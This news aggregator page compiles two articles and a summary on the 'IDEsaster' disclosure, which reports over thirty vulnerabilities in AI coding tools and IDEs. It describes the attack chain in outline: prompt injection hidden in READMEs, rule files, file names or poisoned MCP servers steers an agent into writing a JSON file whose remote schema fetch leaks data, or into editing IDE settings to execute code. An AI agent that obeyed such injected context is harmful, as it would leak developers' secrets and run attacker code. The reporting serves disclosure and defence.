2 Sources
2 Sources
[1]
Critical flaws found in AI development tools dubbed an 'IDEsaster' -- data theft and remote code execution possible
New research identifies more than thirty vulnerabilities across AI coding tools, revealing a universal attack chain that affects every major AI-integrated IDE tested. A six-month investigation into AI-assisted development tools has uncovered over thirty security vulnerabilities that allow data exfiltration and, in some cases, remote code execution. The findings, described in the IDEsaster research report, show how AI agents embedded in IDEs such as Visual Studio Code, JetBrains products, Zed, and numerous commercial assistants can be manipulated into leaking sensitive information or executing attacker-controlled code. According to the research, 100% of tested AI IDEs and coding assistants were vulnerable. Products affected include GitHub Copilot, Cursor, Windsurf, Kiro.dev, Zed.dev, Roo Code, Junie, Cline, Gemini CLI, and Claude Code, with at least twenty-four assigned CVEs and additional advisories from AWS. The core issue comes from how AI agents interact with long-standing IDE features. These editors were never designed for autonomous components capable of reading, editing, and generating files. When AI assistants gained these abilities, previously benign features became attack surfaces. "All AI IDEs... effectively ignore the base software... in their threat model. They treat their features as inherently safe because they've been there for years. However, once you add AI agents that can act autonomously, the same features can be weaponized into data exfiltration and RCE primitives," said security researcher Ari Marzouk, speaking to The Hacker News. According to the research report, this is an IDE-agnostic attack chain, beginning with context hijacking via prompt injection. Hidden instructions can be planted in rule files, READMEs, file names, or outputs from malicious MCP servers. Once an agent processes that context, its tools can be directed to perform legitimate actions that trigger unsafe behaviors in the base IDE. The final stage abuses built-in features to extract data or execute attacker code across any AI IDE sharing that base software layer. One documented example involves writing a JSON file that references a remote schema. The IDE automatically fetches that schema, leaking parameters embedded by the agent, including sensitive data collected earlier in the chain. Visual Studio Code, JetBrains IDEs, and Zed all exhibited this behavior. Even developer safeguards like diff previews did not suppress the outbound request. Another case study demonstrates full remote code execution through manipulated IDE settings. By editing an executable file already present in the workspace and then modifying configuration fields such as php.validate.executablePath, an attacker can cause the IDE to immediately run arbitrary code the moment a related file type is opened or created. JetBrains tools show similar exposure through workspace metadata. The report concludes that short term, the vulnerability class cannot be eliminated because current IDEs were not built under what the researcher calls the "Secure for AI" principle. Mitigations exist for both developers and tool vendors, but the long-term fix requires fundamentally redesigning how IDEs allow AI agents to read, write, and act inside projects.
[2]
Researchers Uncover 30+ Flaws in AI Coding Tools Enabling Data Theft and RCE Attacks
Over 30 security vulnerabilities have been disclosed in various artificial intelligence (AI)-powered Integrated Development Environments (IDEs) that combine prompt injection primitives with legitimate features to achieve data exfiltration and remote code execution. The security shortcomings have been collectively named IDEsaster by security researcher Ari Marzouk (MaccariTA). They affect popular IDEs and extensions such as Cursor, Windsurf, Kiro.dev, GitHub Copilot, Zed.dev, Roo Code, Junie, and Cline, among others. Of these, 24 have been assigned CVE identifiers. "I think the fact that multiple universal attack chains affected each and every AI IDE tested is the most surprising finding of this research," Marzouk told The Hacker News. "All AI IDEs (and coding assistants that integrate with them) effectively ignore the base software (IDE) in their threat model. They treat their features as inherently safe because they've been there for years. However, once you add AI agents that can act autonomously, the same features can be weaponized into data exfiltration and RCE primitives." At its core, these issues chain three different vectors that are common to AI-driven IDEs - The highlighted issues are different from prior attack chains that have leveraged prompt injections in conjunction with vulnerable tools (or abusing legitimate tools to perform read or write actions) to modify an AI agent's configuration to achieve code execution or other unintended behavior. What makes IDEsaster notable is that it takes prompt injection primitives and an agent's tools, using them to activate legitimate features of the IDE to result in information leakage or command execution. Context hijacking can be pulled off in myriad ways, including through user-added context references that can take the form of pasted URLs or text with hidden characters that are not visible to the human eye, but can be parsed by the LLM. Alternatively, the context can be polluted by using a Model Context Protocol (MCP) server through tool poisoning or rug pulls, or when a legitimate MCP server parses attacker-controlled input from an external source. Some of the identified attacks made possible by the new exploit chain is as follows - It's worth noting that the last two examples hinge on an AI agent being configured to auto-approve file writes, which subsequently allows an attacker with the ability to influence prompts to cause malicious workspace settings to be written. But given that this behavior is auto-approved by default for in-workspace files, it leads to arbitrary code execution without any user interaction or the need to reopen the workspace. With prompt injections and jailbreaks acting as the first step for the attack chain, Marzouk offers the following recommendations - Developers of AI agents and AI IDEs are advised to apply the principle of least privilege to LLM tools, minimize prompt injection vectors, harden the system prompt, use sandboxing to run commands, perform security testing for path traversal, information leakage, and command injection. The disclosure coincides with the discovery of several vulnerabilities in AI coding tools that could have a wide range of impacts - As agentic AI tools are becoming increasingly popular in enterprise environments, these findings demonstrate how AI tools expand the attack surface of development machines, often by leveraging an LLM's inability to distinguish between instructions provided by a user to complete a task and content that it may ingest from an external source, which, in turn, can contain an embedded malicious prompt. "Any repository using AI for issue triage, PR labeling, code suggestions, or automated replies is at risk of prompt injection, command injection, secret exfiltration, repository compromise and upstream supply chain compromise," Aikido researcher Rein Daelman said. Marzouk also said the discoveries emphasized the importance of "Secure for AI," which is a new paradigm that has been coined by the researcher to tackle security challenges introduced by AI features, thereby ensuring that products are not only secure by default and secure by design, but are also conceived keeping in mind how AI components can be abused over time. "This is another example of why the 'Secure for AI' principle is needed," Marzouk said. "Connecting AI agents to existing applications (in my case IDE, in their case GitHub Actions) creates new emerging risks."
Share
Share
Copy Link
Security researchers have uncovered over 30 vulnerabilities across every major AI-powered IDE tested, including GitHub Copilot, Cursor, and Visual Studio Code. The IDEsaster findings reveal how AI agents can be manipulated through prompt injection to leak sensitive data or execute malicious code, with 24 CVEs assigned and 100% of tested tools affected.
A six-month investigation into AI coding tools has exposed a sweeping security crisis affecting every major development platform. Security researcher Ari Marzouk uncovered over 30 security vulnerabilities that enable data exfiltration and remote code execution across AI-assisted development tools, with 100% of tested platforms found vulnerable
1
2
. The research, dubbed IDEsaster, affects widely used AI-powered Integrated Development Environments including GitHub Copilot, Cursor, Windsurf, Kiro.dev, Zed.dev, Roo Code, Junie, Cline, Gemini CLI, and Claude Code. At least 24 CVEs have been assigned, with additional advisories issued by AWS1
.
Source: Hacker News
The core problem stems from a fundamental mismatch between traditional IDE architecture and autonomous AI capabilities. Visual Studio Code, JetBrains products, Zed, and other platforms were designed decades before AI agents existed, never anticipating components capable of autonomously reading, editing, and generating files. "All AI IDEs effectively ignore the base software in their threat model. They treat their features as inherently safe because they've been there for years. However, once you add AI agents that can act autonomously, the same features can be weaponized into data exfiltration and RCE primitives," Marzouk told The Hacker News
1
. This disconnect creates an IDE-agnostic attack chain that works across platforms sharing similar base software layers.The IDEsaster attack chain follows a three-stage pattern common to AI coding assistants. It begins with context hijacking via prompt injection, where hidden instructions are planted in configuration files, READMEs, file names, or outputs from malicious Model Context Protocol servers
2
. These prompt injection primitives can include user-added context references with invisible characters that humans cannot see but large language models parse readily. Once an AI agent processes that poisoned context, its tools can be directed to perform seemingly legitimate actions that trigger unsafe behaviors in the underlying IDE. The final stage abuses built-in features to extract sensitive information or execute attacker-controlled code1
.One documented exploit involves writing a JSON file that references a remote schema. The IDE automatically fetches that schema, inadvertently leaking parameters embedded by the AI agent, including sensitive data collected earlier in the attack chain. Visual Studio Code, JetBrains IDEs, and Zed all exhibited this behavior, with even developer safeguards like diff previews failing to suppress the outbound request
1
. Another case study demonstrates full remote code execution through manipulated IDE settings. By editing an executable file already present in the workspace and modifying configuration fields such as php.validate.executablePath, attackers can cause the IDE to immediately run arbitrary code when a related file type is opened or created1
.
Source: Tom's Hardware
Related Stories
As agentic AI tools gain traction in enterprise development workflows, these findings reveal how AI components fundamentally expand the attack surface of development machines. The vulnerabilities exploit an LLM's inability to distinguish between legitimate user instructions and malicious content ingested from external sources. "Any repository using AI for issue triage, PR labeling, code suggestions, or automated replies is at risk of prompt injection, command injection, secret exfiltration, repository compromise and upstream supply chain compromise," warned Aikido researcher Rein Daelman
2
. The auto-approve behavior for in-workspace file writes, enabled by default in many AI coding assistants, allows arbitrary code execution without user interaction or workspace reopening2
.Marzouk emphasizes that short-term fixes cannot eliminate this vulnerability class because current IDEs were not built under what he calls the "Secure for AI" principle. This new paradigm ensures products are conceived with AI component abuse in mind from the start, going beyond secure by default and secure by design approaches
1
2
. Recommended mitigations include applying the principle of least privilege to LLM tools, minimizing prompt injection vectors, hardening system prompts, using sandboxing to run commands, and performing security testing for path traversal, information leakage, and command injection2
. The long-term fix requires fundamentally redesigning how IDEs allow AI agents to read, write, and act inside projects, addressing the threat model gap that currently treats legacy features as inherently safe despite their new autonomous context1
.Summarized by
Navi
[1]